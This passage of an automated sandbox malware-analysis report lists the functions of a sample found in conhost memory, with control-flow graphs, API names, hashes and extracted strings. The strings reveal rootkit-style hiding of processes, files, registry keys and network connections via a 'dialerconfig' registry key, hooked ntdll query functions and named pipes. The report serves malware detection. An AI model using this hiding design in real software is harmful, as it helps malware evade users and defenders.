                                                                                                    control_flow_graph 203 1c08c1b2cdc-1c08c1b2d55 call 1c08c1cecc0 206 1c08c1b2d5b-1c08c1b2d61 203->206 207 1c08c1b3090-1c08c1b30b3 203->207 206->207 208 1c08c1b2d67-1c08c1b2d6a 206->208 208->207 209 1c08c1b2d70-1c08c1b2d73 208->209 209->207 210 1c08c1b2d79-1c08c1b2d89 GetModuleHandleA 209->210 211 1c08c1b2d8b-1c08c1b2d9b call 1c08c1c3090 210->211 212 1c08c1b2d9d 210->212 214 1c08c1b2da0-1c08c1b2dbe 211->214 212->214 214->207 217 1c08c1b2dc4-1c08c1b2de3 StrCmpNIW 214->217 217->207 218 1c08c1b2de9-1c08c1b2ded 217->218 218->207 219 1c08c1b2df3-1c08c1b2dfd 218->219 219->207 220 1c08c1b2e03-1c08c1b2e0a 219->220 220->207 221 1c08c1b2e10-1c08c1b2e23 220->221 222 1c08c1b2e33 221->222 223 1c08c1b2e25-1c08c1b2e31 221->223 224 1c08c1b2e36-1c08c1b2e3a 222->224 223->224 225 1c08c1b2e4a 224->225 226 1c08c1b2e3c-1c08c1b2e48 224->226 227 1c08c1b2e4d-1c08c1b2e57 225->227 226->227 228 1c08c1b2f4d-1c08c1b2f51 227->228 229 1c08c1b2e5d-1c08c1b2e60 227->229 230 1c08c1b3082-1c08c1b308a 228->230 231 1c08c1b2f57-1c08c1b2f5a 228->231 232 1c08c1b2e72-1c08c1b2e7c 229->232 233 1c08c1b2e62-1c08c1b2e6f call 1c08c1b1a14 229->233 230->207 230->221 234 1c08c1b2f6b-1c08c1b2f75 231->234 235 1c08c1b2f5c-1c08c1b2f68 call 1c08c1b1a14 231->235 237 1c08c1b2e7e-1c08c1b2e8b 232->237 238 1c08c1b2eb0-1c08c1b2eba 232->238 233->232 242 1c08c1b2f77-1c08c1b2f84 234->242 243 1c08c1b2fa5-1c08c1b2fa8 234->243 235->234 237->238 245 1c08c1b2e8d-1c08c1b2e9a 237->245 239 1c08c1b2eea-1c08c1b2eed 238->239 240 1c08c1b2ebc-1c08c1b2ec9 238->240 247 1c08c1b2efb-1c08c1b2f08 lstrlenW 239->247 248 1c08c1b2eef-1c08c1b2ef9 call 1c08c1b1d28 239->248 240->239 246 1c08c1b2ecb-1c08c1b2ed8 240->246 242->243 250 1c08c1b2f86-1c08c1b2f93 242->250 251 1c08c1b2faa-1c08c1b2fb3 call 1c08c1b1d28 243->251 252 1c08c1b2fb5-1c08c1b2fc2 lstrlenW 243->252 253 1c08c1b2e9d-1c08c1b2ea3 245->253 256 1c08c1b2edb-1c08c1b2ee1 246->256 258 1c08c1b2f2b-1c08c1b2f3d call 1c08c1b3930 247->258 259 1c08c1b2f0a-1c08c1b2f14 247->259 248->247 263 1c08c1b2f43-1c08c1b2f48 248->263 260 1c08c1b2f96-1c08c1b2f9c 250->260 251->252 270 1c08c1b2ffa-1c08c1b3005 251->270 254 1c08c1b2fe5-1c08c1b2fef call 1c08c1b3930 252->254 255 1c08c1b2fc4-1c08c1b2fce 252->255 262 1c08c1b2ea9-1c08c1b2eae 253->262 253->263 265 1c08c1b2ff2-1c08c1b2ff4 254->265 255->254 264 1c08c1b2fd0-1c08c1b2fe3 call 1c08c1b1554 255->264 256->263 266 1c08c1b2ee3-1c08c1b2ee8 256->266 258->263 258->265 259->258 269 1c08c1b2f16-1c08c1b2f29 call 1c08c1b1554 259->269 260->270 271 1c08c1b2f9e-1c08c1b2fa3 260->271 262->238 262->253 263->265 264->254 264->270 265->230 265->270 266->239 266->256 269->258 269->263 277 1c08c1b307c-1c08c1b3080 270->277 278 1c08c1b3007-1c08c1b300b 270->278 271->243 271->260 277->230 281 1c08c1b300d-1c08c1b3011 278->281 282 1c08c1b3013-1c08c1b302d call 1c08c1b86a0 278->282 281->282 284 1c08c1b3030-1c08c1b3033 281->284 282->284 286 1c08c1b3056-1c08c1b3059 284->286 287 1c08c1b3035-1c08c1b3053 call 1c08c1b86a0 284->287 286->277 290 1c08c1b305b-1c08c1b3079 call 1c08c1b86a0 286->290 287->286 290->277
                                                                                                    APIs
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000029.00000002.2622635464.000001C08C1B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 000001C08C1B0000, based on PE: true
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_41_2_1c08c1b0000_conhost.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: lstrlen$FileHandleModuleName$AddressCloseFindOpenPathProcProcess
                                                                                                    • String ID: NtQueryObject$\Device\Nsi$ntdll.dll
                                                                                                    • API String ID: 2119608203-3850299575
                                                                                                    • Opcode ID: 2588cc794520ead529bdc0a32c038e4709a5f15ae479e9f47b13431256f42674
                                                                                                    • Instruction ID: e5384dc9f26e6f692084fd63c054772a28567d692bc78afb4e14bf39fce11ea9
                                                                                                    • Opcode Fuzzy Hash: 2588cc794520ead529bdc0a32c038e4709a5f15ae479e9f47b13431256f42674
                                                                                                    • Instruction Fuzzy Hash: 2AB17E72A50A50C1FFA69F26D480BE9A3B4FB4AFA4F94901AEE0953794DF35CC54CB40
                                                                                                    Function 000001C08C1B7E70 Relevance: 10.6, APIs: 7, Instructions: 72COMMON
                                                                                                    Download Yara Rule

                                                                                                    Control-flow Graph

                                                                                                    APIs
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000029.00000002.2622635464.000001C08C1B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 000001C08C1B0000, based on PE: true
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_41_2_1c08c1b0000_conhost.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: ExceptionFilterPresentUnhandled$CaptureContextDebuggerEntryFeatureFunctionLookupProcessorUnwindVirtual
                                                                                                    • String ID:
                                                                                                    • API String ID: 3140674995-0
                                                                                                    • Opcode ID: 1239a149ef62a939d07da7a6345777f7e6476c10c46ebdc58c2fff80381e5b80
                                                                                                    • Instruction ID: 52578243787ff22093cbbdfe51c71ec01a7b89e3fcea8ca852e770a15c5a5a00
                                                                                                    • Opcode Fuzzy Hash: 1239a149ef62a939d07da7a6345777f7e6476c10c46ebdc58c2fff80381e5b80
                                                                                                    • Instruction Fuzzy Hash: 89313C72644A80C5FB619F60E880BD97370F789B54F44842AEA4D47A98EF38C948CB10
                                                                                                    Function 000001C08C1BB50C Relevance: 9.1, APIs: 6, Instructions: 83COMMON
                                                                                                    Download Yara Rule
                                                                                                    APIs
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000029.00000002.2622635464.000001C08C1B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 000001C08C1B0000, based on PE: true
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_41_2_1c08c1b0000_conhost.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: ExceptionFilterUnhandled$CaptureContextDebuggerEntryFunctionLookupPresentUnwindVirtual
                                                                                                    • String ID:
                                                                                                    • API String ID: 1239891234-0
                                                                                                    • Opcode ID: b9fdfb6abdc39c0bfa3e984213bb5a27592c3a0080b3e524afb5147b282a99cd
                                                                                                    • Instruction ID: 192fe8def0747c66c9966677678a13e2ea7825cd74f390ec4d09b643b8cb8cc1
                                                                                                    • Opcode Fuzzy Hash: b9fdfb6abdc39c0bfa3e984213bb5a27592c3a0080b3e524afb5147b282a99cd
                                                                                                    • Instruction Fuzzy Hash: 3F316D36644B80C6EB61CF25E880BDE73B4F78AB64F508116EA9D43B99DF38C945CB00
                                                                                                    Function 000001C08C1BFEF8 Relevance: 7.8, APIs: 5, Instructions: 328fileCOMMON
                                                                                                    Download Yara Rule
                                                                                                    APIs
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000029.00000002.2622635464.000001C08C1B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 000001C08C1B0000, based on PE: true
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_41_2_1c08c1b0000_conhost.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: ErrorFileLastWrite$ConsoleOutput
                                                                                                    • String ID:
                                                                                                    • API String ID: 1443284424-0
                                                                                                    • Opcode ID: 85b244371d408b05e75db82bfcedca3f922ea5a775ba2aedb63ed3d562987fa1
                                                                                                    • Instruction ID: 2af1099ed1f54c5930f89af15b7a8bdb4cbd9863cf787fb34e304f066d7587b8
                                                                                                    • Opcode Fuzzy Hash: 85b244371d408b05e75db82bfcedca3f922ea5a775ba2aedb63ed3d562987fa1
                                                                                                    • Instruction Fuzzy Hash: 15E1D072B94A80CAFB02CF64E4C06DD7BB1F34AF98F548116EE5A57B99DA34C916C700
                                                                                                    Function 000001C08C1B1650 Relevance: 50.9, APIs: 20, Strings: 9, Instructions: 157registrymemoryCOMMON
                                                                                                    Download Yara Rule

                                                                                                    Control-flow Graph

                                                                                                    APIs
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000029.00000002.2622635464.000001C08C1B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 000001C08C1B0000, based on PE: true
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_41_2_1c08c1b0000_conhost.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: Heap$CloseOpen$Process$Alloc$EnumFreeInfoQueryValuelstrlen
                                                                                                    • String ID: SOFTWARE\dialerconfig$paths$pid$process_names$service_names$startup$tcp_local$tcp_remote$udp
                                                                                                    • API String ID: 106492572-2879589442
                                                                                                    • Opcode ID: 1a30f3953b7b2857fef7ab9bb527f69cc88a70ac074ccf0af09289a77df583cb
                                                                                                    • Instruction ID: 37e61d1c893b152ff257292813f8f67e88616a79ab9d33da1a821b562a5bd39e
                                                                                                    • Opcode Fuzzy Hash: 1a30f3953b7b2857fef7ab9bb527f69cc88a70ac074ccf0af09289a77df583cb
                                                                                                    • Instruction Fuzzy Hash: CB712736A90E40C6FF129F61E8D0AD9A3B4FB8EF98F519111EA4D43A28DF38C855C700
                                                                                                    Function 000001C08C1B12C8 Relevance: 26.4, APIs: 14, Strings: 1, Instructions: 120memoryregistrystringCOMMON
                                                                                                    Download Yara Rule

                                                                                                    Control-flow Graph

                                                                                                    APIs
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000029.00000002.2622635464.000001C08C1B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 000001C08C1B0000, based on PE: true
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_41_2_1c08c1b0000_conhost.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: Heap$Process$Alloc$Free$EnumInfoQueryValuelstrlen
                                                                                                    • String ID: d
                                                                                                    • API String ID: 2005889112-2564639436
                                                                                                    • Opcode ID: b748d707dce532ba85059e887555c778ed1ca062867acd86e7106c3b72fc9f19
                                                                                                    • Instruction ID: e1f01fb367381824d08459acef72d691b855000535abc4f25b7592be426eee0d
                                                                                                    • Opcode Fuzzy Hash: b748d707dce532ba85059e887555c778ed1ca062867acd86e7106c3b72fc9f19
                                                                                                    • Instruction Fuzzy Hash: D85159B2A94B44D6FB15CB62E584BDAB3B1F78AF90F558124EA4A07B14DF38C465CB00
                                                                                                    Function 000001C08C1B1EB4 Relevance: 22.8, APIs: 1, Strings: 12, Instructions: 65threadCOMMON
                                                                                                    Download Yara Rule

                                                                                                    Control-flow Graph

                                                                                                    APIs
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000029.00000002.2622635464.000001C08C1B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 000001C08C1B0000, based on PE: true
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_41_2_1c08c1b0000_conhost.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: CurrentThread$AddressHandleModuleProc
                                                                                                    • String ID: EnumServiceGroupW$EnumServicesStatusExW$NtDeviceIoControlFile$NtEnumerateKey$NtEnumerateValueKey$NtQueryDirectoryFile$NtQueryDirectoryFileEx$NtQuerySystemInformation$NtResumeThread$advapi32.dll$ntdll.dll$sechost.dll
                                                                                                    • API String ID: 4175298099-1975688563
                                                                                                    • Opcode ID: 4311b3b4e112faf7cd717d4cb8614ddd441db72e36ac1e322346e5d8367ce93d
                                                                                                    • Instruction ID: c78f4b14ab89c88cd34d50ede6f5b09523ef9eca4af47476978709177122e9a9
                                                                                                    • Opcode Fuzzy Hash: 4311b3b4e112faf7cd717d4cb8614ddd441db72e36ac1e322346e5d8367ce93d
                                                                                                    • Instruction Fuzzy Hash: 36316FB09C194AE0FF4BEB65E8D2ED42331AB4FB54FC0D513A519122769E38CA4DC790
                                                                                                    Function 000001C08C1B23F0 Relevance: 14.1, APIs: 6, Strings: 2, Instructions: 52filethreadCOMMON
                                                                                                    Download Yara Rule

                                                                                                    Control-flow Graph

                                                                                                    APIs
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000029.00000002.2622635464.000001C08C1B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 000001C08C1B0000, based on PE: true
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_41_2_1c08c1b0000_conhost.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: Process$File$CloseHandle$CreateCurrentOpenReadThreadWow64Write
                                                                                                    • String ID: \\.\pipe\dialerchildproc32$\\.\pipe\dialerchildproc64
                                                                                                    • API String ID: 2171963597-1373409510
                                                                                                    • Opcode ID: 81a5590feb268d746862aeeaca95d5a7bb0e3fb4412a03f66270e8c9225f983f
                                                                                                    • Instruction ID: 78fad9975ff790711cb006281104e8d72ba61fb3ed6ce6f497d0e70c5ba33a2d
                                                                                                    • Opcode Fuzzy Hash: 81a5590feb268d746862aeeaca95d5a7bb0e3fb4412a03f66270e8c9225f983f
                                                                                                    • Instruction Fuzzy Hash: 33211076A94B40C2FB118B25E58879977B0F78AFA4F908215EA5942FA8DF3CC559CF00
                                                                                                    Function 000001C08C1B104C Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 97memoryregistryCOMMON
                                                                                                    Download Yara Rule

                                                                                                    Control-flow Graph

                                                                                                    APIs
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000029.00000002.2622635464.000001C08C1B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 000001C08C1B0000, based on PE: true
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_41_2_1c08c1b0000_conhost.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: Heap$Process$AllocEnumFreeInfoQueryValue
                                                                                                    • String ID: d
                                                                                                    • API String ID: 3743429067-2564639436
                                                                                                    • Opcode ID: ed3eaeac9b5240f017c69614fb8be245425dbd9313f990ab10755c486963d35d
                                                                                                    • Instruction ID: 9cf1e939b2fa242f7ef8c976bf2ebc2a8242314b63cb942b5188d1c1e5250b37
                                                                                                    • Opcode Fuzzy Hash: ed3eaeac9b5240f017c69614fb8be245425dbd9313f990ab10755c486963d35d
                                                                                                    • Instruction Fuzzy Hash: 1A419273654B80DBEB618F61E484BDAB7B1F38AB94F508125EB8907B54DF38C564CB00
                                                                                                    Function 000001C08C1869F0 Relevance: 12.2, APIs: 8, Instructions: 230COMMON
                                                                                                    Download Yara Rule

                                                                                                    Control-flow Graph

                                                                                                    • Executed
                                                                                                    • Not Executed
                                                                                                    control_flow_graph 318 1c08c1869f0-1c08c1869f6 319 1c08c1869f8-1c08c1869fb 318->319 320 1c08c186a31-1c08c186a3b 318->320 322 1c08c1869fd-1c08c186a00 319->322 323 1c08c186a25-1c08c186a64 call 1c08c1870a0 319->323 321 1c08c186b58-1c08c186b6d 320->321 326 1c08c186b7c-1c08c186b96 call 1c08c186f34 321->326 327 1c08c186b6f 321->327 324 1c08c186a18 __scrt_dllmain_crt_thread_attach 322->324 325 1c08c186a02-1c08c186a05 322->325 341 1c08c186a6a-1c08c186a7f call 1c08c186f34 323->341 342 1c08c186b32 323->342 333 1c08c186a1d-1c08c186a24 324->333 329 1c08c186a11-1c08c186a16 call 1c08c186fe4 325->329 330 1c08c186a07-1c08c186a10 325->330 339 1c08c186b98-1c08c186bcd call 1c08c18705c call 1c08c186efc call 1c08c1873f8 call 1c08c187210 call 1c08c187234 call 1c08c18708c 326->339 340 1c08c186bcf-1c08c186c00 call 1c08c187270 326->340 331 1c08c186b71-1c08c186b7b 327->331 329->333 339->331 350 1c08c186c11-1c08c186c17 340->350 351 1c08c186c02-1c08c186c08 340->351 353 1c08c186b4a-1c08c186b57 call 1c08c187270 341->353 354 1c08c186a85-1c08c186a96 call 1c08c186fa4 341->354 345 1c08c186b34-1c08c186b49 342->345 357 1c08c186c19-1c08c186c23 350->357 358 1c08c186c5e-1c08c186c74 call 1c08c182858 350->358 351->350 356 1c08c186c0a-1c08c186c0c 351->356 353->321 368 1c08c186a98-1c08c186abc call 1c08c1873bc call 1c08c186eec call 1c08c186f18 call 1c08c1890dc 354->368 369 1c08c186ae7-1c08c186af1 call 1c08c187210 354->369 363 1c08c186cff-1c08c186d0c 356->363 364 1c08c186c2f-1c08c186c3d call 1c08c192758 357->364 365 1c08c186c25-1c08c186c2d 357->365 376 1c08c186cac-1c08c186cae 358->376 377 1c08c186c76-1c08c186c78 358->377 371 1c08c186c43-1c08c186c58 call 1c08c1869f0 364->371 387 1c08c186cf5-1c08c186cfd 364->387 365->371 368->369 421 1c08c186abe-1c08c186ac5 __scrt_dllmain_after_initialize_c 368->421 369->342 389 1c08c186af3-1c08c186aff call 1c08c187260 369->389 371->358 371->387 385 1c08c186cb0-1c08c186cb3 376->385 386 1c08c186cb5-1c08c186cca call 1c08c1869f0 376->386 377->376 384 1c08c186c7a-1c08c186c9c call 1c08c182858 call 1c08c186b58 377->384 384->376 415 1c08c186c9e-1c08c186ca6 call 1c08c192758 384->415 385->386 385->387 386->387 400 1c08c186ccc-1c08c186cd6 386->400 387->363 408 1c08c186b01-1c08c186b0b call 1c08c187178 389->408 409 1c08c186b25-1c08c186b30 389->409 405 1c08c186cd8-1c08c186cdf 400->405 406 1c08c186ce1-1c08c186cf1 call 1c08c192758 400->406 405->387 406->387 408->409 420 1c08c186b0d-1c08c186b1b 408->420 409->345 415->376 420->409 421->369 422 1c08c186ac7-1c08c186ae4 call 1c08c189078 421->422 422->369
                                                                                                    APIs
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000029.00000002.2622576710.000001C08C180000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001C08C180000, based on PE: true
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_41_2_1c08c180000_conhost.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: Initialize__scrt_acquire_startup_lock__scrt_dllmain_after_initialize_c__scrt_dllmain_crt_thread_attach__scrt_release_startup_lock
                                                                                                    • String ID:
                                                                                                    • API String ID: 190073905-0
                                                                                                    • Opcode ID: 95b57d6277a84fb56418f177327e884c31f38a66bae6651e6bdbad69dc24b832
                                                                                                    • Instruction ID: 601e834268a8c8e5a9ee7ca4c858c56ec369cb53ef0f1416d94c96a1f27f854a
                                                                                                    • Opcode Fuzzy Hash: 95b57d6277a84fb56418f177327e884c31f38a66bae6651e6bdbad69dc24b832
                                                                                                    • Instruction Fuzzy Hash: EF81BE31E88641C6FE57AB2598E1FD96AF0EB4FF80F94C035EA6547796DB38C8468300
                                                                                                    Function 000001C08C1B75F0 Relevance: 12.2, APIs: 8, Instructions: 230COMMON
                                                                                                    Download Yara Rule

                                                                                                    Control-flow Graph

                                                                                                    • Executed
                                                                                                    • Not Executed
                                                                                                    control_flow_graph 425 1c08c1b75f0-1c08c1b75f6 426 1c08c1b75f8-1c08c1b75fb 425->426 427 1c08c1b7631-1c08c1b763b 425->427 429 1c08c1b75fd-1c08c1b7600 426->429 430 1c08c1b7625-1c08c1b7664 call 1c08c1b7ca0 426->430 428 1c08c1b7758-1c08c1b776d 427->428 434 1c08c1b776f 428->434 435 1c08c1b777c-1c08c1b7796 call 1c08c1b7b34 428->435 432 1c08c1b7618 __scrt_dllmain_crt_thread_attach 429->432 433 1c08c1b7602-1c08c1b7605 429->433 448 1c08c1b766a-1c08c1b767f call 1c08c1b7b34 430->448 449 1c08c1b7732 430->449 437 1c08c1b761d-1c08c1b7624 432->437 439 1c08c1b7611-1c08c1b7616 call 1c08c1b7be4 433->439 440 1c08c1b7607-1c08c1b7610 433->440 441 1c08c1b7771-1c08c1b777b 434->441 446 1c08c1b7798-1c08c1b77cd call 1c08c1b7c5c call 1c08c1b7afc call 1c08c1b7ff8 call 1c08c1b7e10 call 1c08c1b7e34 call 1c08c1b7c8c 435->446 447 1c08c1b77cf-1c08c1b7800 call 1c08c1b7e70 435->447 439->437 446->441 457 1c08c1b7802-1c08c1b7808 447->457 458 1c08c1b7811-1c08c1b7817 447->458 460 1c08c1b774a-1c08c1b7757 call 1c08c1b7e70 448->460 461 1c08c1b7685-1c08c1b7696 call 1c08c1b7ba4 448->461 452 1c08c1b7734-1c08c1b7749 449->452 457->458 462 1c08c1b780a-1c08c1b780c 457->462 463 1c08c1b7819-1c08c1b7823 458->463 464 1c08c1b785e-1c08c1b7874 call 1c08c1b3458 458->464 460->428 478 1c08c1b7698-1c08c1b76bc call 1c08c1b7fbc call 1c08c1b7aec call 1c08c1b7b18 call 1c08c1b9cdc 461->478 479 1c08c1b76e7-1c08c1b76f1 call 1c08c1b7e10 461->479 468 1c08c1b78ff-1c08c1b790c 462->468 469 1c08c1b782f-1c08c1b783d call 1c08c1c3358 463->469 470 1c08c1b7825-1c08c1b782d 463->470 481 1c08c1b78ac-1c08c1b78ae 464->481 482 1c08c1b7876-1c08c1b7878 464->482 475 1c08c1b7843-1c08c1b7858 call 1c08c1b75f0 469->475 492 1c08c1b78f5-1c08c1b78fd 469->492 470->475 475->464 475->492 478->479 528 1c08c1b76be-1c08c1b76c5 __scrt_dllmain_after_initialize_c 478->528 479->449 501 1c08c1b76f3-1c08c1b76ff call 1c08c1b7e60 479->501 490 1c08c1b78b0-1c08c1b78b3 481->490 491 1c08c1b78b5-1c08c1b78ca call 1c08c1b75f0 481->491 482->481 489 1c08c1b787a-1c08c1b789c call 1c08c1b3458 call 1c08c1b7758 482->489 489->481 522 1c08c1b789e-1c08c1b78a6 call 1c08c1c3358 489->522 490->491 490->492 491->492 510 1c08c1b78cc-1c08c1b78d6 491->510 492->468 512 1c08c1b7701-1c08c1b770b call 1c08c1b7d78 501->512 513 1c08c1b7725-1c08c1b7730 501->513 516 1c08c1b78d8-1c08c1b78df 510->516 517 1c08c1b78e1-1c08c1b78f1 call 1c08c1c3358 510->517 512->513 527 1c08c1b770d-1c08c1b771b 512->527 513->452 516->492 517->492 522->481 527->513 528->479 529 1c08c1b76c7-1c08c1b76e4 call 1c08c1b9c78 528->529 529->479
                                                                                                    APIs
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000029.00000002.2622635464.000001C08C1B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 000001C08C1B0000, based on PE: true
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_41_2_1c08c1b0000_conhost.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: Initialize__scrt_acquire_startup_lock__scrt_dllmain_after_initialize_c__scrt_dllmain_crt_thread_attach__scrt_release_startup_lock
                                                                                                    • String ID:
                                                                                                    • API String ID: 190073905-0
                                                                                                    • Opcode ID: 95b57d6277a84fb56418f177327e884c31f38a66bae6651e6bdbad69dc24b832
                                                                                                    • Instruction ID: 162328503974b270ea54638007661105da54cb56bc323e4bfaa36a24ec41a532
                                                                                                    • Opcode Fuzzy Hash: 95b57d6277a84fb56418f177327e884c31f38a66bae6651e6bdbad69dc24b832
                                                                                                    • Instruction Fuzzy Hash: 90818131FC4241C6FE57AB2698C1BD962B0AB8FFA0F54C415AA0547FD6DA38CC518FA0
                                                                                                    Function 000001C08C1B9804 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 88libraryloaderCOMMONLIBRARYCODE
                                                                                                    Download Yara Rule

                                                                                                    Control-flow Graph

                                                                                                    • Executed
                                                                                                    • Not Executed
                                                                                                    control_flow_graph 532 1c08c1b9804-1c08c1b9842 533 1c08c1b9848-1c08c1b984b 532->533 534 1c08c1b9933 532->534 535 1c08c1b9851 533->535 536 1c08c1b9935-1c08c1b9951 533->536 534->536 537 1c08c1b9854 535->537 538 1c08c1b992b 537->538 539 1c08c1b985a-1c08c1b9869 537->539 538->534 540 1c08c1b986b-1c08c1b986e 539->540 541 1c08c1b9876-1c08c1b9895 LoadLibraryExW 539->541 542 1c08c1b990d-1c08c1b991c call 1c08c1c3090 540->542 543 1c08c1b9874 540->543 544 1c08c1b98ed-1c08c1b9902 541->544 545 1c08c1b9897-1c08c1b98a0 call 1c08c1c3080 541->545 542->538 554 1c08c1b991e-1c08c1b9929 542->554 548 1c08c1b98e1-1c08c1b98e8 543->548 544->542 546 1c08c1b9904-1c08c1b9907 FreeLibrary 544->546 552 1c08c1b98cf-1c08c1b98d9 545->552 553 1c08c1b98a2-1c08c1b98b7 call 1c08c1bad28 545->553 546->542 548->537 552->548 553->552 557 1c08c1b98b9-1c08c1b98cd LoadLibraryExW 553->557 554->536 557->544 557->552
                                                                                                    APIs
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000029.00000002.2622635464.000001C08C1B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 000001C08C1B0000, based on PE: true
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_41_2_1c08c1b0000_conhost.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: Library$Load$AddressErrorFreeLastProc
                                                                                                    • String ID: api-ms-
                                                                                                    • API String ID: 2559590344-2084034818
                                                                                                    • Opcode ID: b7fd7646394baccca3f1b1048765e4d0241f371571e58ba301572f288adf5d58
                                                                                                    • Instruction ID: 304617a1dcf7ca27d0f54ce4db2857c15162b80c90fa435c300479710c26edfb
                                                                                                    • Opcode Fuzzy Hash: b7fd7646394baccca3f1b1048765e4d0241f371571e58ba301572f288adf5d58
                                                                                                    • Instruction Fuzzy Hash: A9318431A92B94D1FE53DB12A480BD963B4B74EFB0F598525ED2D47394EF38C8568B00
                                                                                                    Function 000001C08C1C1B9C Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 48fileCOMMON
                                                                                                    Download Yara Rule

                                                                                                    Control-flow Graph

                                                                                                    APIs
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000029.00000002.2622635464.000001C08C1B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 000001C08C1B0000, based on PE: true
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_41_2_1c08c1b0000_conhost.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: ConsoleWrite$CloseCreateErrorFileHandleLast
                                                                                                    • String ID: CONOUT$
                                                                                                    • API String ID: 3230265001-3130406586
                                                                                                    • Opcode ID: fbbfc3741cb00c8850d54b7fda61e687de032808d93317950d0633c9a62c2227
                                                                                                    • Instruction ID: e4d0f680c01a84c457105b048380fb5d193eb88c1a6e07265eaf8a5ce9d678cd
                                                                                                    • Opcode Fuzzy Hash: fbbfc3741cb00c8850d54b7fda61e687de032808d93317950d0633c9a62c2227
                                                                                                    • Instruction Fuzzy Hash: C9119071BD4B40C6FB518B42E884B99A2B0F38EFE4F508214FA5D87794CF38C5148744
                                                                                                    Function 000001C08C1B5C10 Relevance: 9.2, APIs: 6, Instructions: 240threadCOMMON
                                                                                                    Download Yara Rule

                                                                                                    Control-flow Graph

                                                                                                    • Executed
                                                                                                    • Not Executed
                                                                                                    control_flow_graph 581 1c08c1b5c10-1c08c1b5c37 582 1c08c1b5c4b-1c08c1b5c56 GetCurrentThreadId 581->582 583 1c08c1b5c39-1c08c1b5c48 581->583 584 1c08c1b5c58-1c08c1b5c5d 582->584 585 1c08c1b5c62-1c08c1b5c69 582->585 583->582 588 1c08c1b608f-1c08c1b60a6 call 1c08c1b7a20 584->588 586 1c08c1b5c7b-1c08c1b5c8f 585->586 587 1c08c1b5c6b-1c08c1b5c76 call 1c08c1b5a40 585->587 591 1c08c1b5c9e-1c08c1b5ca4 586->591 587->588 594 1c08c1b5caa-1c08c1b5cb3 591->594 595 1c08c1b5d75-1c08c1b5d96 591->595 597 1c08c1b5cfa-1c08c1b5d6d call 1c08c1b45f0 call 1c08c1b4590 call 1c08c1b4550 594->597 598 1c08c1b5cb5-1c08c1b5cf8 call 1c08c1b86a0 594->598 599 1c08c1b5eff-1c08c1b5f10 call 1c08c1b759f 595->599 600 1c08c1b5d9c-1c08c1b5dbc GetThreadContext 595->600 610 1c08c1b5d70 597->610 598->610 614 1c08c1b5f15-1c08c1b5f1b 599->614 603 1c08c1b5efa 600->603 604 1c08c1b5dc2-1c08c1b5de3 600->604 603->599 604->603 612 1c08c1b5de9-1c08c1b5df2 604->612 610->591 616 1c08c1b5e72-1c08c1b5e83 612->616 617 1c08c1b5df4-1c08c1b5e05 612->617 618 1c08c1b5fde-1c08c1b5fee 614->618 619 1c08c1b5f21-1c08c1b5f78 VirtualProtect FlushInstructionCache 614->619 628 1c08c1b5ef5 616->628 629 1c08c1b5e85-1c08c1b5ea3 616->629 624 1c08c1b5e6d 617->624 625 1c08c1b5e07-1c08c1b5e1c 617->625 622 1c08c1b5ffe-1c08c1b600a call 1c08c1b4ed0 618->622 623 1c08c1b5ff0-1c08c1b5ff7 618->623 626 1c08c1b5f7a-1c08c1b5f84 619->626 627 